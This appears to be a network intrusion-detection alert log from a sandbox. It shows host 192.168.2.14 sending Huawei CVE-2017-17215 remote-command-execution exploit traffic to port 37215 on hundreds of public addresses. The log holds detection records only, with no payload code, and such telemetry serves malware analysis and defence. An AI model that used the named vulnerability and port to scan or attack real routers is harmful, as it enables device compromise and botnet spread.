                                                    07/10/24-08:27:22.931726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4920237215192.168.2.14157.44.159.153
                                                    07/10/24-08:27:14.875328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5627837215192.168.2.14157.195.217.2
                                                    07/10/24-08:26:26.581833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717037215192.168.2.1460.107.150.18
                                                    07/10/24-08:26:15.881754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3376837215192.168.2.1441.154.211.85
                                                    07/10/24-08:26:18.001576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5042237215192.168.2.14157.179.247.157
                                                    07/10/24-08:26:42.463708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4157437215192.168.2.14197.235.12.216
                                                    07/10/24-08:26:41.482995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5696837215192.168.2.14157.112.171.108
                                                    07/10/24-08:26:41.455347TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5434437215192.168.2.14157.235.187.166
                                                    07/10/24-08:26:31.046263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4773037215192.168.2.14157.61.175.213
                                                    07/10/24-08:27:17.066216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5339237215192.168.2.14197.200.162.142
                                                    07/10/24-08:27:05.155297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4940037215192.168.2.14197.181.244.39
                                                    07/10/24-08:27:08.439676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432037215192.168.2.14197.144.36.198
                                                    07/10/24-08:27:13.750468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4745837215192.168.2.1441.67.135.4
                                                    07/10/24-08:27:27.058367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3731437215192.168.2.14197.89.123.154
                                                    07/10/24-08:26:25.489238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5349437215192.168.2.14197.46.80.161
                                                    07/10/24-08:26:34.188754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3725637215192.168.2.1441.97.174.73
                                                    07/10/24-08:26:53.190112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4868237215192.168.2.14157.198.184.12
                                                    07/10/24-08:26:49.808476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5721637215192.168.2.1441.175.185.255
                                                    07/10/24-08:26:17.972385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3521037215192.168.2.14157.192.205.142
                                                    07/10/24-08:26:28.916413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5554837215192.168.2.14157.218.49.230
                                                    07/10/24-08:27:14.855642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5272837215192.168.2.1441.235.147.64
                                                    07/10/24-08:26:55.449640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5619237215192.168.2.1464.86.203.230
                                                    07/10/24-08:27:05.172720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4332837215192.168.2.1441.216.26.237
                                                    07/10/24-08:27:24.872806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4970637215192.168.2.14197.156.109.140
                                                    07/10/24-08:26:38.533121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4380837215192.168.2.1444.67.85.13
                                                    07/10/24-08:26:42.412174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5660237215192.168.2.14157.111.76.162
                                                    07/10/24-08:26:29.833709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3504237215192.168.2.1441.126.33.65
                                                    07/10/24-08:26:41.621146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4489437215192.168.2.14179.35.114.143
                                                    07/10/24-08:27:08.432094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5007837215192.168.2.14197.25.181.129
                                                    07/10/24-08:26:11.600235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5685037215192.168.2.1441.109.187.107
                                                    07/10/24-08:26:43.597937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3357837215192.168.2.14191.143.25.50
                                                    07/10/24-08:27:19.198870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5565237215192.168.2.14141.2.48.230
                                                    07/10/24-08:26:29.805912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3899237215192.168.2.14157.237.208.80
                                                    07/10/24-08:26:33.254426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3691037215192.168.2.1441.103.151.167
                                                    07/10/24-08:27:23.942697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5323637215192.168.2.14105.151.147.232
                                                    07/10/24-08:26:28.927122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4172637215192.168.2.14158.13.77.98
                                                    07/10/24-08:26:52.048430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5117637215192.168.2.14197.25.194.71
                                                    07/10/24-08:27:10.609289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4998437215192.168.2.1446.121.13.134
                                                    07/10/24-08:26:59.615141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5985437215192.168.2.1441.180.104.155
                                                    07/10/24-08:27:05.113927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3875637215192.168.2.14197.254.138.0
                                                    07/10/24-08:26:17.963816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5776237215192.168.2.14157.78.25.150
                                                    07/10/24-08:26:31.098599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4690037215192.168.2.1497.169.142.156
                                                    07/10/24-08:27:19.316090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3750237215192.168.2.14113.38.101.118
                                                    07/10/24-08:26:59.539411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4978437215192.168.2.14175.220.167.54
                                                    07/10/24-08:26:29.766220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4309637215192.168.2.14157.153.10.149
                                                    07/10/24-08:27:07.353904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5333037215192.168.2.14197.138.93.56
                                                    07/10/24-08:27:32.591904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5751837215192.168.2.14157.58.41.245
                                                    07/10/24-08:27:11.514451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4831237215192.168.2.14202.206.29.161
                                                    07/10/24-08:26:28.768053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4716437215192.168.2.14197.7.132.161
                                                    07/10/24-08:27:27.065687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3310637215192.168.2.14157.6.30.41
                                                    07/10/24-08:27:02.798764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5891237215192.168.2.14207.241.41.67
                                                    07/10/24-08:26:41.424240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3860037215192.168.2.1441.94.220.47
                                                    07/10/24-08:27:30.522972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4710237215192.168.2.1441.62.143.187
                                                    07/10/24-08:27:30.406013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5852437215192.168.2.14157.200.219.2
                                                    07/10/24-08:26:14.819736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3803837215192.168.2.14157.82.42.129
                                                    07/10/24-08:26:55.442446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5909237215192.168.2.14157.119.65.38
                                                    07/10/24-08:26:38.585781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5865837215192.168.2.14197.223.59.226
                                                    07/10/24-08:26:53.197285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5872837215192.168.2.1441.220.8.78
                                                    07/10/24-08:27:11.556328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5877237215192.168.2.14157.85.138.200
                                                    07/10/24-08:27:10.652052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3341437215192.168.2.14197.140.188.104
                                                    07/10/24-08:26:43.784447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3555437215192.168.2.1441.1.242.106
                                                    07/10/24-08:26:57.542157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5222437215192.168.2.1441.34.244.13
                                                    07/10/24-08:27:05.096875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3292237215192.168.2.1441.41.67.51
                                                    07/10/24-08:26:31.070289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3866037215192.168.2.14179.50.113.236
                                                    07/10/24-08:26:57.593962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4438037215192.168.2.1441.30.63.83
                                                    07/10/24-08:26:28.689305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5939037215192.168.2.14157.61.103.95
                                                    07/10/24-08:26:20.152800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5818837215192.168.2.14157.54.96.72
                                                    07/10/24-08:26:22.300019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3873837215192.168.2.14100.40.17.52
                                                    07/10/24-08:26:48.012279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3526437215192.168.2.14197.151.33.177
                                                    07/10/24-08:27:11.516345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300037215192.168.2.1441.237.242.254
                                                    07/10/24-08:26:25.498788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3999237215192.168.2.1441.152.28.63
                                                    07/10/24-08:27:10.595631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4353237215192.168.2.1441.44.255.235
                                                    07/10/24-08:26:41.463564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3941237215192.168.2.1488.47.81.195
                                                    07/10/24-08:26:13.805293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5281837215192.168.2.14197.26.165.34
                                                    07/10/24-08:26:15.861414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5427837215192.168.2.14197.107.129.34
                                                    07/10/24-08:26:28.739373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3284637215192.168.2.14142.140.229.32
                                                    07/10/24-08:26:51.949287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3908037215192.168.2.14157.160.106.128
                                                    07/10/24-08:26:57.593723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3572037215192.168.2.1441.60.208.123
                                                    07/10/24-08:26:33.220659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3965037215192.168.2.14157.51.0.135
                                                    07/10/24-08:27:17.098663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6060437215192.168.2.14197.12.37.174
                                                    07/10/24-08:26:28.758809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5537037215192.168.2.144.115.197.84
                                                    07/10/24-08:27:23.930240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5932837215192.168.2.14213.223.8.217
                                                    07/10/24-08:27:30.526140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5447637215192.168.2.14157.226.13.184
                                                    07/10/24-08:27:31.454702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4825037215192.168.2.1441.105.100.223
                                                    07/10/24-08:27:10.742603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4434637215192.168.2.1444.201.4.233
                                                    07/10/24-08:26:11.135196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3990237215192.168.2.14157.152.213.148
                                                    07/10/24-08:27:30.499303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941437215192.168.2.1441.218.51.119
                                                    07/10/24-08:26:48.007312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3400237215192.168.2.14191.19.221.111
                                                    07/10/24-08:26:57.641730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3497637215192.168.2.14197.240.6.119
                                                    07/10/24-08:27:31.547528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5199037215192.168.2.14105.120.155.126
                                                    07/10/24-08:27:31.463374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4791237215192.168.2.14177.120.46.148
                                                    07/10/24-08:26:34.193253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4836237215192.168.2.1441.55.176.123
                                                    07/10/24-08:27:24.997758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717237215192.168.2.14102.158.90.106
                                                    07/10/24-08:26:20.108378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6073837215192.168.2.1436.80.154.43
                                                    07/10/24-08:26:25.454213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5395837215192.168.2.1441.246.37.196
                                                    07/10/24-08:26:53.143446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442637215192.168.2.1441.204.234.42
                                                    07/10/24-08:27:11.537934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4234237215192.168.2.1450.77.75.173
                                                    07/10/24-08:27:22.797705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5143237215192.168.2.1441.56.160.172
                                                    07/10/24-08:26:29.868955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3595637215192.168.2.1441.247.170.121
                                                    07/10/24-08:27:23.952903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5818037215192.168.2.14197.255.14.163
                                                    07/10/24-08:26:13.787067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3376837215192.168.2.14157.120.162.132
                                                    07/10/24-08:27:13.850928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4179837215192.168.2.14207.179.139.38
                                                    07/10/24-08:27:13.993407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5966037215192.168.2.14197.181.49.49
                                                    07/10/24-08:27:30.554316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5487037215192.168.2.1441.63.108.234
                                                    07/10/24-08:27:02.824725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4357837215192.168.2.1441.168.79.48
                                                    07/10/24-08:27:19.265032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6058037215192.168.2.14197.229.3.255
                                                    07/10/24-08:26:41.545793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3715237215192.168.2.14197.78.126.147
                                                    07/10/24-08:27:24.969390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5846037215192.168.2.1492.53.236.75
                                                    07/10/24-08:27:19.284664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4984037215192.168.2.1441.127.220.228
                                                    07/10/24-08:26:43.722420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4274237215192.168.2.14108.13.199.136
                                                    07/10/24-08:26:55.369458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3945437215192.168.2.14203.161.174.220
                                                    07/10/24-08:26:31.088464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3698637215192.168.2.14157.153.33.254
                                                    07/10/24-08:26:57.655125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5611037215192.168.2.14197.217.125.18
                                                    07/10/24-08:26:33.214564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4231837215192.168.2.14197.228.88.7
                                                    07/10/24-08:26:45.603574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4586237215192.168.2.1441.255.28.224
                                                    07/10/24-08:26:36.314456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5440637215192.168.2.1441.115.241.128
                                                    07/10/24-08:26:13.770173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5497437215192.168.2.14197.33.215.163
                                                    07/10/24-08:27:23.457605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4919437215192.168.2.1439.177.193.153
                                                    07/10/24-08:26:47.908603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4515837215192.168.2.14197.250.195.172
                                                    07/10/24-08:27:22.835160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5065237215192.168.2.1441.67.123.226
                                                    07/10/24-08:26:42.418339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3932037215192.168.2.14197.26.160.61
                                                    07/10/24-08:27:17.005251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3727637215192.168.2.1441.172.138.122
                                                    07/10/24-08:27:07.262409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5227637215192.168.2.14197.245.134.92
                                                    07/10/24-08:27:13.949060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4478437215192.168.2.14197.119.34.134
                                                    07/10/24-08:26:18.008169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6048437215192.168.2.1474.12.218.64
                                                    07/10/24-08:27:32.581630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4833237215192.168.2.1441.68.142.10
                                                    07/10/24-08:27:07.376738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5096237215192.168.2.14157.108.101.99
                                                    07/10/24-08:27:05.121354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4873837215192.168.2.1441.143.18.126
                                                    07/10/24-08:26:13.755859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4351437215192.168.2.14157.223.56.115
                                                    07/10/24-08:26:18.024186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5478037215192.168.2.1460.58.113.204
                                                    07/10/24-08:26:13.845798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3457037215192.168.2.14197.237.24.115
                                                    07/10/24-08:26:28.782504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3397237215192.168.2.14157.159.55.18
                                                    07/10/24-08:27:17.044198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4707037215192.168.2.1441.189.75.50
                                                    07/10/24-08:27:19.152826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3677437215192.168.2.1452.251.73.131
                                                    07/10/24-08:26:29.829287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4569237215192.168.2.14157.98.71.161
                                                    07/10/24-08:27:05.199033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3896437215192.168.2.14157.77.249.181
                                                    07/10/24-08:27:10.605753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5475837215192.168.2.1441.43.59.46
                                                    07/10/24-08:26:26.618604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5410837215192.168.2.14157.245.176.132
                                                    07/10/24-08:26:25.519002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4405837215192.168.2.1441.66.240.75
                                                    07/10/24-08:26:42.459798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4198837215192.168.2.1441.57.47.179
                                                    07/10/24-08:26:43.615736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5790037215192.168.2.14197.154.193.55
                                                    07/10/24-08:27:27.096599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3969637215192.168.2.14197.72.109.188
                                                    07/10/24-08:26:25.430533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4479837215192.168.2.14157.145.220.135
                                                    07/10/24-08:26:59.766044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5324037215192.168.2.14134.96.86.166
                                                    07/10/24-08:26:55.405670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4214437215192.168.2.14197.10.87.35
                                                    07/10/24-08:27:08.357813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5750237215192.168.2.14157.104.70.18
                                                    07/10/24-08:27:02.989706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3870037215192.168.2.14197.97.21.251
                                                    07/10/24-08:27:05.155297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4407237215192.168.2.1441.137.30.1
                                                    07/10/24-08:27:22.877679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4060437215192.168.2.14197.91.249.160
                                                    07/10/24-08:26:28.927814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4177037215192.168.2.1441.13.41.19
                                                    07/10/24-08:26:11.136124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3691237215192.168.2.14197.211.212.8
                                                    07/10/24-08:26:36.308740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4022837215192.168.2.14122.247.236.212
                                                    07/10/24-08:27:30.482034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3917637215192.168.2.142.52.194.81
                                                    07/10/24-08:27:08.426882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5605437215192.168.2.1441.56.104.82
                                                    07/10/24-08:26:45.681028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3379637215192.168.2.1441.84.54.167
                                                    07/10/24-08:26:47.901324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5672837215192.168.2.14157.5.10.120
                                                    07/10/24-08:26:55.454904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4094837215192.168.2.14197.31.188.218
                                                    07/10/24-08:27:33.758837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4425637215192.168.2.14197.120.144.6
                                                    07/10/24-08:27:33.856159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4909037215192.168.2.14157.202.57.33
                                                    07/10/24-08:26:22.285937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5108437215192.168.2.1441.91.134.150
                                                    07/10/24-08:26:43.846786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4899637215192.168.2.14157.247.76.173
                                                    07/10/24-08:27:28.140303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5399437215192.168.2.14197.218.247.16
                                                    07/10/24-08:26:55.366242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4661037215192.168.2.1441.79.200.131
                                                    07/10/24-08:27:10.654504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4099037215192.168.2.1441.211.100.115
                                                    07/10/24-08:26:26.601174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5085637215192.168.2.14197.29.101.120
                                                    07/10/24-08:26:53.171769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4408237215192.168.2.14168.137.96.206
                                                    07/10/24-08:26:25.433410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5034037215192.168.2.14197.35.189.181
                                                    07/10/24-08:27:17.023576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4208237215192.168.2.14157.169.51.30
                                                    07/10/24-08:27:23.873303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435037215192.168.2.1441.114.161.170
                                                    07/10/24-08:26:22.296401TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4334437215192.168.2.1441.243.85.198
                                                    07/10/24-08:26:55.450781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4498837215192.168.2.1441.247.112.62
                                                    07/10/24-08:26:25.523968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4409037215192.168.2.14103.168.187.46
                                                    07/10/24-08:27:11.558298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4317837215192.168.2.14197.242.129.43
                                                    07/10/24-08:26:42.376307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6034237215192.168.2.14157.22.238.183
                                                    07/10/24-08:27:10.632992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4823237215192.168.2.14150.252.222.200
                                                    07/10/24-08:27:33.764510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4269437215192.168.2.14157.44.112.197
                                                    07/10/24-08:26:17.980540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4750437215192.168.2.14190.242.55.63
                                                    07/10/24-08:26:43.713774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3429237215192.168.2.1441.146.87.143
                                                    07/10/24-08:26:38.630807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3330637215192.168.2.14197.120.11.182
                                                    07/10/24-08:26:55.410349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4667037215192.168.2.1441.243.194.148
                                                    07/10/24-08:27:02.796781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5826637215192.168.2.14197.119.130.233
                                                    07/10/24-08:27:27.147425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4205637215192.168.2.14206.83.152.44
                                                    07/10/24-08:27:27.081335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5623237215192.168.2.14157.35.29.202
                                                    07/10/24-08:27:08.377189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5759637215192.168.2.14157.249.183.124
                                                    07/10/24-08:26:34.238567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3433437215192.168.2.1441.92.147.31
